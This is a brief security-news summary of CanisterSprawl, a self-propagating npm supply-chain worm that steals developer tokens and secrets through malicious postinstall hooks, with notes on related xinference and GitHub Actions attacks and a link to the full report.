Researchers have flagged a supply-chain worm dubbed CanisterSprawl that uses compromised npm packages and stolen developer npm tokens to push poisoned releases and self-propagate via malicious postinstall hooks. The campaign exfiltrates extensive developer secrets to an HTTPS webhook and an ICP canister, includes PyPI propagation logic, and sits alongside other attacks like xinference compromises and the prt-scan GitHub Actions exploit. #CanisterSprawl #xinference
Keypoints
- CanisterSprawl is a self-propagating supply-chain worm that spreads by stealing npm tokens and publishing poisoned package versions.
- The malware abuses npm postinstall hooks to harvest a wide range of developer secrets, including .npmrc, SSH keys, cloud credentials, and local .env files.
- Stolen data is exfiltrated to an HTTPS webhook and an ICP canister, making infrastructure takedown more difficult.
- The campaign includes PyPI propagation logic to upload malicious Python packages when credentials are available, and JFrog reported xinference versions were compromised with a teampcp-marked payload.
- Related threats include malicious npm/PyPI packages that install LLM proxies and other backdoors, Asurion-impersonation packages, and the prt-scan GitHub Actions exploit targeting pull_request_target to steal secrets.
Read More: https://thehackernews.com/2026/04/self-propagating-supply-chain-worm.html